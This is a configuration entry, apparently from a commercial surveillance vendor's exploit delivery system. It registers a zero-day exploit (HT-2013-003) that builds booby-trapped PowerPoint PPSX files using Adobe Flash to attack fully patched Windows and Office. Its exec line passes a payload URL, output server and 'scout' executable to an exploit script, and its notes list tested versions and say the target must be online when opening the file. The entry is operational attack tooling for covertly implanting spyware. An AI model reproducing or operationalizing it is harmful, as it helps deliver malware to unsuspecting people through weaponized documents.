version: 20140930
id: HT-2013-003
name: Microsoft PowerPoint 2007/2010/2013 + Adobe Flash
category: :zeroday
format:
- ppsx
platform: windows
multiserver: true
exploit_server: true
exec: python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT% %OUTPUT_SERVER% %SCOUT_NAME%.exe
params:
file: Document
string: URL
description: "
Output: PPSX file
Note: The target must be connected to the internet when opening the document.
Platform: Windows
Tested on:
Windows XP/Vista/7
Microsoft Office 2007/2010/2013 (full patched) - Require Adobe Flash v11.1.102.55 or above for Internet Explorer"
.